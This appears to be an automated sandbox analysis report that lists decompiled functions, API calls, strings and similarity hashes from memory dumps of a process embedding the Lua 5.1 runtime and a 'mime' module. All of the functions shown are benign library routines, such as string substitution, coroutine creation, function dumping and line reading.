Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addstring.lua_tolstring.strstr$FileL_addlstring.L_buffinit.L_error.L_gsub.L_pushresult.ModuleNamelua_remove.strrchr
String ID: unable to get ModuleFileName
API String ID: 628390781-205594539
Opcode ID: 1840632dd69cc1e1db20209e811d9906ac52533a91661e3927af251b61137fec
Instruction ID: e2904118825fcd23bf0499d0a0809e334150eb7a965eb55f3f13ce048e7f1b9f
Opcode Fuzzy Hash: 1840632dd69cc1e1db20209e811d9906ac52533a91661e3927af251b61137fec
Instruction Fuzzy Hash: 9501A47990821077FB10E754AC42FEB32ECEF46350F494618FA98951C2FBB9E58486B3

Uniqueness

Uniqueness Score: -1.00%

Function 10016140, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016140(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t2;
				char* _t7;
				void* _t11;
				void* _t13;

				_t11 = __ecx;
				_t14 = _a4;
				_t2 = E1000F4A0(__eflags, _a4, 1, 0);
				_t13 = E100161B0(__eflags, _a4, _t2, E1000F4A0(__eflags, _a4, 2, 0));
				if(_t13 != 0) {
					E100018C0(_t14);
					E100012B0(__eflags, _t14, 0xfffffffe);
					__eflags = _t13 - 1;
					_t7 = "open";
					if(_t13 != 1) {
						_t7 = "init";
					}
					E10001980(_t11, _t14, _t7);
					return 3;
				} else {
					return 1;
				}
			}

0x10016140
0x10016141
0x1001614b
0x10016164
0x1001616b
0x10016176
0x1001617e
0x10016186
0x10016189
0x1001618e
0x10016190
0x10016190
0x10016197
0x100161a6
0x1001616e
0x10016174
0x10016174

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001614B

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checklstring.LUA5.1(?,00000002,00000000,?,00000001,00000000), ref: 10016157
lua_pushnil.LUA5.1(?), ref: 10016176
lua_insert.LUA5.1(?,000000FE,?), ref: 1001617E
lua_pushstring.LUA5.1(?,open), ref: 10016197

Strings

open, xrefs: 10016189
init, xrefs: 10016190, 10016195

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.$lua_insert.lua_pushnil.lua_pushstring.lua_tolstring.
String ID: init$open
API String ID: 2965937684-3963617861
Opcode ID: 980cb665942e1d7353c7bdff0241394305f1167cc6dfcb452d589348f1edd1a2
Instruction ID: 71a936d93c66294f735ecc031546c116cf9037778e77f12221cb0eb401a0eab5
Opcode Fuzzy Hash: 980cb665942e1d7353c7bdff0241394305f1167cc6dfcb452d589348f1edd1a2
Instruction Fuzzy Hash: 2DF0126A64556032E511911C7C42FDF119DCFC67A4F554025F904AF286DD69FAC302EA

Uniqueness

Uniqueness Score: -1.00%

Function 10010DA0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DA0(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				void* _t3;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t16;

				_t16 = __eflags;
				_t9 = __ebx;
				_t11 = _a4;
				_t10 = E10001110(_a4);
				_t3 = E10001410(_t16, _a4, 1);
				_t17 = _t3 - 6;
				if(_t3 != 6) {
					L2:
					E1000F090(_t9, _t11, _t18, _t11, 1, "Lua function expected");
				} else {
					_t8 = E10001460(_t17, _t11, 1);
					_t18 = _t8;
					if(_t8 != 0) {
						goto L2;
					}
				}
				E100013D0(_t18, _t11, 1);
				E10001090(_t11, _t10, 1);
				return 1;
			}

0x10010da0
0x10010da0
0x10010da1
0x10010daf
0x10010db1
0x10010db9
0x10010dbc
0x10010dcd
0x10010dd5
0x10010dbe
0x10010dc1
0x10010dc9
0x10010dcb
0x00000000
0x00000000
0x10010dcb
0x10010de0
0x10010de9
0x10010df8

APIs

lua_newthread.LUA5.1(?), ref: 10010DA7
lua_type.LUA5.1(?,00000001,?), ref: 10010DB1
lua_iscfunction.LUA5.1(?,00000001), ref: 10010DC1
luaL_argerror.LUA5.1(?,00000001,Lua function expected), ref: 10010DD5
lua_pushvalue.LUA5.1(?,00000001), ref: 10010DE0
lua_xmove.LUA5.1(?,00000000,00000001,?,00000001), ref: 10010DE9

Strings

Lua function expected, xrefs: 10010DCD

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_iscfunction.lua_newthread.lua_pushvalue.lua_type.lua_xmove.
String ID: Lua function expected
API String ID: 3434600467-3717604881
Opcode ID: 79b3f64d85674d111db15ab29251e463a465c9e6604645d57f974e4280fee49f
Instruction ID: 78291d66c6f2aac343a553eeefb6cd4e15ab70226aec32fa2d58c3fc61258099
Opcode Fuzzy Hash: 79b3f64d85674d111db15ab29251e463a465c9e6604645d57f974e4280fee49f
Instruction Fuzzy Hash: 6EE06D3AA6212031FC20A1653C43FCF2149CF927C4F050028F600BA1CBF5EAB6C241A6

Uniqueness

Uniqueness Score: -1.00%

Function 100148C0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E100148C0(void* __ebx, void* __eflags, intOrPtr _a4) {
				char _v524;
				void* _t9;
				intOrPtr _t16;
				void* _t18;

				_t16 = _a4;
				E1000F410(__ebx, __eflags, _t16, 1, 6);
				E10001160(_t16, 1);
				E1000FC00(_t16,  &_v524);
				_t9 = E10002230(_t16, E10014930,  &_v524);
				_t18 =  &_v524 + 0x28;
				if(_t9 != 0) {
					_push("unable to dump given function");
					_push(_t16);
					E1000F230();
					_t18 = _t18 + 8;
				}
				E1000FB40( &_v524);
				return 1;
			}

0x100148c7
0x100148d3
0x100148db
0x100148e6
0x100148f6
0x100148fb
0x10014900
0x10014902
0x10014907
0x10014908
0x1001490d
0x1001490d
0x10014915
0x10014929

APIs

luaL_checktype.LUA5.1(?,00000001,00000006), ref: 100148D3

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_settop.LUA5.1(?,00000001,?,00000001,00000006), ref: 100148DB
luaL_buffinit.LUA5.1(?,?,?,00000001,?,00000001,00000006), ref: 100148E6
lua_dump.LUA5.1(?,10014930,?,?,?,?,00000001,?,00000001,00000006), ref: 100148F6

Part of subcall function 10002230: luaU_dump.LUA5.1(?,?,?,?,00000000), ref: 1000225A

luaL_error.LUA5.1(?,unable to dump given function), ref: 10014908

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

luaL_pushresult.LUA5.1(?), ref: 10014915

Strings

unable to dump given function, xrefs: 10014902

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_buffinit.L_checktype.L_error.L_pushresult.L_where.U_dump.lua_concat.lua_dump.lua_error.lua_pushvfstring.lua_settop.lua_type.
String ID: unable to dump given function
API String ID: 4243074062-4187293423
Opcode ID: f51a64dca8131b738a48b1180b9199540f369165325a562bdff6cb44a00a7227
Instruction ID: 680fa7564d0cd8580dcd1acdb1e0f5e3293769c7ddd89bce295db90c1dd4771c
Opcode Fuzzy Hash: f51a64dca8131b738a48b1180b9199540f369165325a562bdff6cb44a00a7227
Instruction Fuzzy Hash: A8F0A0B982121032F610E610AC43FFF324CDF55784F040528BA046508BEBAAB79686F7

Uniqueness

Uniqueness Score: -1.00%

Function 100135D0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E100135D0(int* __eax, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _t16;

				__imp___errno();
				_t16 =  *__eax;
				if(_a8 == 0) {
					_t18 = _a4;
					E100018C0(_a4);
					_push(strerror(_t16));
					E100019F0(_t18, "%s: %s", _a12);
					_push(_t16);
					E10001910(__fp0, _t18);
					return 3;
				} else {
					E10001AE0(_a4, 1);
					return 1;
				}
			}

0x100135d1
0x100135d7
0x100135df
0x100135f8
0x100135fd
0x1001360d
0x10013615
0x1001361a
0x1001361c
0x1001362b
0x100135e1
0x100135e8
0x100135f6
0x100135f6

APIs

_errno.MSVCRT ref: 100135D1
lua_pushboolean.LUA5.1(?,00000001,?,100135C9,?,00000001), ref: 100135E8
lua_pushnil.LUA5.1(100135C9,?,?,100135C9,?,00000001), ref: 100135FD
strerror.MSVCRT ref: 10013603
lua_pushfstring.LUA5.1(100135C9,%s: %s,?,00000000,?,100135C9,?,?,100135C9,?,00000001), ref: 10013615
lua_pushinteger.LUA5.1(100135C9,?,100135C9,%s: %s,?,00000000,?,100135C9,?,?,100135C9,?,00000001), ref: 1001361C

Strings

%s: %s, xrefs: 1001360F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _errnolua_pushboolean.lua_pushfstring.lua_pushinteger.lua_pushnil.strerror
String ID: %s: %s
API String ID: 3794273909-3740598653
Opcode ID: 6e08282da6340d073d908540e0117cfe372f9453ff57e981962888d6fffd62ee
Instruction ID: 05062b0537d63d288258c77b535f36ea56dc3414e4e5493504ba3c0be3ae4a9c
Opcode Fuzzy Hash: 6e08282da6340d073d908540e0117cfe372f9453ff57e981962888d6fffd62ee
Instruction Fuzzy Hash: 66F0123A6042107BE601D758EC45EAF37ADEF8A690F048418F504D7245D675F98287A6

Uniqueness

Uniqueness Score: -1.00%

Function 00401060, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401060(struct _IO_FILE* _a4) {
				void* _t3;
				intOrPtr* _t18;
				void* _t20;

				_t18 = __imp____iob_func;
				if(_t3 != 0) {
					fprintf( *_t18(_t3) + 0x40, "%s: ");
					_t20 = _t20 + 0xc;
				}
				fprintf( *_t18() + 0x40, "%s\n");
				_a4 =  *_t18() + 0x40;
				return fflush(_a4);
			}

0x00401063
0x00401070
0x0040107e
0x00401080
0x00401080
0x00401093
0x0040109f
0x004010a3

APIs

__iob_func.MSVCR80 ref: 00401078
fprintf.MSVCR80 ref: 0040107E
__iob_func.MSVCR80 ref: 0040108D
fprintf.MSVCR80 ref: 00401093
__iob_func.MSVCR80 ref: 00401098

Strings

%s, xrefs: 00401088
%s: , xrefs: 00401073

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$fprintf
String ID: %s$%s:
API String ID: 743380796-1131586811
Opcode ID: 1910718e93600685742a75c70622f0f9d180b423c5e650f95053b8ef9b035b37
Instruction ID: ca629cf822423b9349ea4458e895acec5f116e0013ae91158b718afed74609c3
Opcode Fuzzy Hash: 1910718e93600685742a75c70622f0f9d180b423c5e650f95053b8ef9b035b37
Instruction Fuzzy Hash: DDE04FB2A01115BFF3006BA9AC12A9B7B9CAD85655B098437E884F7290D574EE004BA9

Uniqueness

Uniqueness Score: -1.00%

Function 009C1000, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E009C1000(intOrPtr _a4) {
				intOrPtr _t5;

				_t5 = _a4;
				_push(0);
				_push(0x9c4010);
				_push("mime");
				_push(_t5);
				L009C20FC();
				_push("_VERSION");
				_push(_t5);
				L009C20F6();
				_push("MIME 1.0.2");
				_push(_t5);
				L009C20F6();
				_push(0xfffffffd);
				_push(_t5);
				L009C20F0();
				E009C11B0(E009C1670(0x9c41c0, 0x9c40c0), 0x9c42c0);
				return 1;
			}

0x009c1001
0x009c1005
0x009c1007
0x009c100c
0x009c1011
0x009c1012
0x009c1017
0x009c101c
0x009c101d
0x009c1022
0x009c1027
0x009c1028
0x009c102d
0x009c102f
0x009c1030
0x009c1049
0x009c1057

APIs

luaL_openlib.LUA5.1(?,mime,009C4010,00000000), ref: 009C1012
lua_pushstring.LUA5.1(?,_VERSION,?,mime,009C4010,00000000), ref: 009C101D
lua_pushstring.LUA5.1(?,MIME 1.0.2,?,_VERSION,?,mime,009C4010,00000000), ref: 009C1028
lua_rawset.LUA5.1(?,000000FD,?,MIME 1.0.2,?,_VERSION,?,mime,009C4010,00000000), ref: 009C1030

Strings

_VERSION, xrefs: 009C1017
MIME 1.0.2, xrefs: 009C1022
mime, xrefs: 009C100C

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$L_openlib.lua_rawset.
String ID: MIME 1.0.2$_VERSION$mime
API String ID: 2830898266-683567973
Opcode ID: 005e5fa625eb037aa61f7b49cf71033ba625f1611c4e0b2f0bc35118a722ddb8
Instruction ID: abe8fc5b09a7b26fe90a129ac05b166eb980570d7b564ff73e56769ecc582f33
Opcode Fuzzy Hash: 005e5fa625eb037aa61f7b49cf71033ba625f1611c4e0b2f0bc35118a722ddb8
Instruction Fuzzy Hash: 7EE0EC31FC5B2135C631F7646C23F8E01241FD3B58F04020DB760311C39D846682A1AF

Uniqueness

Uniqueness Score: -1.00%

Function 10015730, Relevance: 12.1, APIs: 8, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10015730(void* __eflags, void* __fp0) {
				intOrPtr* _t33;
				intOrPtr _t53;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				_t82 = __fp0;
				_t53 =  *((intOrPtr*)(_t70 + 0x334));
				_t33 = E1000F4A0(__eflags, _t53, 1, _t70 + 0x18);
				_t69 = 0;
				_t68 = _t33;
				_t66 = E1000F4A0(__eflags, _t53, 2, 0);
				 *((intOrPtr*)(_t70 + 0x30)) = _t66;
				 *((intOrPtr*)(_t70 + 0x38)) = E1000F600(__eflags, __fp0, _t53, 4,  *((intOrPtr*)(_t70 + 0x34)) + 1);
				_t71 = _t70 + 0x24;
				if( *_t66 != 0x5e) {
					 *((intOrPtr*)(_t71 + 0x10)) = 0;
				} else {
					_t66 = _t66 + 1;
					 *((intOrPtr*)(_t71 + 0x10)) = 1;
					 *((intOrPtr*)(_t71 + 0x18)) = _t66;
				}
				E1000FC00(_t53, _t71 + 0x130);
				_t72 = _t71 + 8;
				_t39 =  *((intOrPtr*)(_t71 + 0x24)) + _t68;
				 *((intOrPtr*)(_t72 + 0x28)) = _t53;
				 *((intOrPtr*)(_t72 + 0x20)) = _t68;
				 *((intOrPtr*)(_t72 + 0x24)) =  *((intOrPtr*)(_t71 + 0x24)) + _t68;
				if( *((intOrPtr*)(_t71 + 0x1c)) > 0) {
					while(1) {
						_push(_t66);
						_push(_t68);
						_push(_t72 + 0x24);
						 *((intOrPtr*)(_t72 + 0x38)) = 0;
						_t67 = E10014B40();
						_t72 = _t72 + 0xc;
						_t77 = _t67;
						if(_t67 == 0) {
							goto L9;
						}
						_push(_t67);
						_push(_t68);
						_push(_t72 + 0x134);
						_push(_t72 + 0x28);
						_t69 = _t69 + 1;
						E100158A0(_t77, _t82);
						_t72 = _t72 + 0x10;
						if(_t67 <= _t68) {
							goto L9;
						} else {
							_t68 = _t67;
							L13:
							if( *((intOrPtr*)(_t72 + 0x10)) != 0 || _t69 >=  *((intOrPtr*)(_t72 + 0x14))) {
								_t39 =  *((intOrPtr*)(_t72 + 0x24));
							} else {
								_t66 =  *((intOrPtr*)(_t72 + 0x18));
								continue;
							}
						}
						goto L16;
						L9:
						_t39 =  *((intOrPtr*)(_t72 + 0x24));
						__eflags = _t68 - _t39;
						if(_t68 < _t39) {
							__eflags =  *((intOrPtr*)(_t72 + 0x130)) - _t72 + 0x33c;
							if(__eflags >= 0) {
								E1000F9E0(__eflags, _t72 + 0x130);
								_t72 = _t72 + 4;
							}
							 *((char*)( *((intOrPtr*)(_t72 + 0x130)))) =  *_t68;
							_t68 = _t68 + 1;
							__eflags = _t68;
							 *((intOrPtr*)(_t72 + 0x130)) =  *((intOrPtr*)(_t72 + 0x130)) + 1;
							goto L13;
						}
						goto L16;
					}
				}
				L16:
				E1000FAC0(_t72 + 0x130, _t68, _t39 - _t68);
				E1000FB40(_t72 + 0x13c);
				_push(_t69);
				E10001910(_t82, _t53);
				return 2;
			}

0x10015730
0x10015737
0x10015749
0x1001574e
0x10015750
0x1001575f
0x10015762
0x1001576f
0x10015775
0x1001577a
0x1001578b
0x1001577c
0x1001577c
0x1001577d
0x10015785
0x10015785
0x10015798
0x100157a5
0x100157a8
0x100157ac
0x100157b0
0x100157b4
0x100157b8
0x100157c4
0x100157c4
0x100157c9
0x100157ca
0x100157cb
0x100157d8
0x100157da
0x100157dd
0x100157df
0x00000000
0x00000000
0x100157e1
0x100157e9
0x100157ee
0x100157ef
0x100157f0
0x100157f1
0x100157f6
0x100157fb
0x00000000
0x100157fd
0x100157fd
0x10015846
0x1001584c
0x10015858
0x100157c0
0x100157c0
0x00000000
0x100157c0
0x1001584c
0x00000000
0x10015801
0x10015801
0x10015805
0x10015807
0x10015817
0x10015819
0x10015823
0x10015828
0x10015828
0x10015834
0x1001583e
0x1001583e
0x1001583f
0x00000000
0x1001583f
0x00000000
0x10015807
0x100157c4
0x1001585c
0x10015868
0x10015875
0x1001587a
0x1001587c
0x10015893

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 10015749

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checklstring.LUA5.1(?,00000002,00000000,?,00000001,?), ref: 10015756
luaL_optinteger.LUA5.1(?,00000004,?,?,00000002,00000000,?,00000001,?), ref: 1001576A

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

luaL_buffinit.LUA5.1(?,?), ref: 10015798
luaL_prepbuffer.LUA5.1(?,?,00000000,00000000), ref: 10015823
luaL_addlstring.LUA5.1(?,00000000,?), ref: 10015868
luaL_pushresult.LUA5.1(?,?,00000000,?), ref: 10015875
lua_pushinteger.LUA5.1(?,00000000,?,?,00000000,?), ref: 1001587C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.$L_addlstring.L_buffinit.L_optinteger.L_prepbuffer.L_pushresult.lua_pushinteger.lua_tolstring.lua_type.
String ID:
API String ID: 2282590234-0
Opcode ID: a594de5b9e2a3b771639af6b2866582fd8b524252ef30ef85a83bd0d67f42de7
Instruction ID: c42cb9a62f8d00357cff5a34c8bdba07216f30075c8acfed2d28f6b0f558d115
Opcode Fuzzy Hash: a594de5b9e2a3b771639af6b2866582fd8b524252ef30ef85a83bd0d67f42de7
Instruction Fuzzy Hash: B841C3B55183419BD320DF14D881EAFB7EDEBC8784F44091DF9899B202E631EA44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009C1E40, Relevance: 12.1, APIs: 8, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E009C1E40(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char* _t14;
				intOrPtr _t18;
				intOrPtr _t20;
				char* _t21;
				intOrPtr _t24;
				char* _t25;
				void* _t26;
				long long* _t28;
				long long _t32;

				_t32 = __fp0;
				_t24 = _a4;
				_push(1);
				_push(_t24);
				L009C214A();
				_t20 = __eax;
				_t14 =  &_v532;
				_push(_t14);
				_push(0);
				_push(2);
				_push(_t24);
				_v536 = __eax;
				_v532 = 0;
				L009C212C();
				_t21 = _v532;
				_push(0);
				_t25 = _t14;
				_push(0x9c3064);
				_push(3);
				_push(_t24);
				_t26 = _t25 + _t21;
				L009C212C();
				_v528 = _t14;
				_push( &_v524);
				_push(_t24);
				L009C211A();
				_t28 =  &_v536 + 0x30;
				if(_t25 != 0) {
					if(_t25 < _t26) {
						do {
							_t21 =  &_v524;
							_t25 = _t25 + 1;
							_t18 = E009C1F20( *_t25, _t20, _v528, _t21);
							_t28 = _t28 + 0x10;
							_t20 = _t18;
						} while (_t25 < _t26);
						_v536 = _t20;
					}
					_push( &_v524);
					L009C2108();
					asm("fild dword [esp+0x14]");
					_push(_t21);
					 *_t28 = _t32;
					_push(_t24);
					L009C2102();
					return 2;
				} else {
					_push(_t24);
					L009C2120();
					_push(_t25);
					_push(_t25);
					_push(_t24);
					L009C2102();
					return 2;
				}
			}

0x009c1e40
0x009c1e4a
0x009c1e51
0x009c1e53
0x009c1e54
0x009c1e59
0x009c1e5b
0x009c1e5f
0x009c1e60
0x009c1e62
0x009c1e64
0x009c1e65
0x009c1e69
0x009c1e71
0x009c1e76
0x009c1e7a
0x009c1e7c
0x009c1e7e
0x009c1e83
0x009c1e85
0x009c1e86
0x009c1e89
0x009c1e92
0x009c1e96
0x009c1e97
0x009c1e98
0x009c1e9d
0x009c1ea2
0x009c1ec7
0x009c1ec9
0x009c1ed0
0x009c1ed8
0x009c1ed9
0x009c1ede
0x009c1ee3
0x009c1ee3
0x009c1ee7
0x009c1ee7
0x009c1eef
0x009c1ef0
0x009c1ef5
0x009c1ef9
0x009c1efa
0x009c1efd
0x009c1efe
0x009c1f15
0x009c1ea4
0x009c1ea4
0x009c1ea5
0x009c1eaa
0x009c1eab
0x009c1eac
0x009c1ead
0x009c1ec4
0x009c1ec4

APIs

luaL_checkinteger.LUA5.1(?,00000001), ref: 009C1E54
luaL_optlstring.LUA5.1 ref: 009C1E71
luaL_optlstring.LUA5.1(?,00000003,009C3064,00000000), ref: 009C1E89
luaL_buffinit.LUA5.1(?,?,?,00000003,009C3064,00000000), ref: 009C1E98
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C1EA5
lua_pushnumber.LUA5.1(?,00000000,00000000,?,?,?,?,?,?,?,?,00000001), ref: 009C1EAD
luaL_pushresult.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C1EF0
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,00000001), ref: 009C1EFE

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: L_optlstring.lua_pushnumber.$L_buffinit.L_checkinteger.L_pushresult.lua_pushnil.
String ID:
API String ID: 3317043786-0
Opcode ID: c05c17a68d1c87eb90862441fbb879d98e7fdf54eda2c8b190a4df8a48611a1f
Instruction ID: 22fec09a3778103065862ef203b1ae089ec28736f55c6f2ac889f02bd08b9d29
Opcode Fuzzy Hash: c05c17a68d1c87eb90862441fbb879d98e7fdf54eda2c8b190a4df8a48611a1f
Instruction Fuzzy Hash: B72105B2E483002BE320BB549C82FBFB7ECDBD6710F44491DFA5092142E679990987A3

Uniqueness

Uniqueness Score: -1.00%

Function 10012720, Relevance: 12.1, APIs: 8, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10012720(void* __eflags, signed int _a4, struct _IO_FILE* _a8) {
				char _v524;
				void* __ebx;
				char* _t18;
				char* _t19;
				signed int _t21;
				char* _t26;
				void* _t30;
				signed int _t31;
				char* _t43;
				struct _IO_FILE* _t44;
				void* _t45;
				void* _t46;

				_t45 =  &_v524;
				_t31 = _a4;
				E1000FC00(_t31, _t45);
				_t18 = E1000F9E0(__eflags,  &_v524);
				_t44 = _a8;
				_t30 = fgets;
				_t43 = _t18;
				_t19 = fgets(_t43, 0x200, _t44);
				_t46 = _t45 + 0x18;
				if(_t19 == 0) {
					L4:
					E1000FB40( &_v524);
					_t21 = E10001770(_t30, _t53, _a4, 0xffffffff);
					asm("sbb eax, eax");
					return  ~_t21;
				} else {
					do {
						asm("repne scasb");
						_t31 =  !(_t31 | 0xffffffff) - 1;
						if(_t31 == 0) {
							goto L3;
						} else {
							_t52 =  *((char*)(_t31 + _t43 - 1)) - 0xa;
							if( *((char*)(_t31 + _t43 - 1)) == 0xa) {
								_v524 = _v524 + _t31 - 1;
								E1000FB40( &_v524);
								return 1;
							} else {
								goto L3;
							}
						}
						goto L6;
						L3:
						_v524 = _v524 + _t31;
						_t43 = E1000F9E0(_t52,  &_v524);
						_t26 = fgets(_t43, 0x200, _t44);
						_t46 = _t46 + 0x10;
						_t53 = _t26;
					} while (_t26 != 0);
					goto L4;
				}
				L6:
			}

0x10012724
0x10012720
0x10012734
0x1001273e
0x10012743
0x1001274a
0x10012750
0x10012759
0x1001275b
0x10012760
0x1001279d
0x100127a2
0x100127b1
0x100127bf
0x100127cb
0x10012762
0x10012762
0x10012769
0x1001276d
0x1001276e
0x00000000
0x10012770
0x10012770
0x10012775
0x100127d9
0x100127dd
0x100127f4
0x00000000
0x00000000
0x00000000
0x10012775
0x00000000
0x10012777
0x10012782
0x1001278b
0x10012794
0x10012796
0x10012799
0x10012799
0x00000000
0x10012762
0x00000000

APIs

luaL_buffinit.LUA5.1(?,?,00000000,?,?,?), ref: 10012734
luaL_prepbuffer.LUA5.1(?,?,?,00000000,?,?,?), ref: 1001273E
fgets.MSVCRT ref: 10012759
luaL_prepbuffer.LUA5.1(?), ref: 10012786
fgets.MSVCRT ref: 10012794
luaL_pushresult.LUA5.1(?), ref: 100127A2
lua_objlen.LUA5.1(?,000000FF,?), ref: 100127B1
luaL_pushresult.LUA5.1(?), ref: 100127DD

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_prepbuffer.L_pushresult.fgets$L_buffinit.lua_objlen.
String ID:
API String ID: 1298739783-0
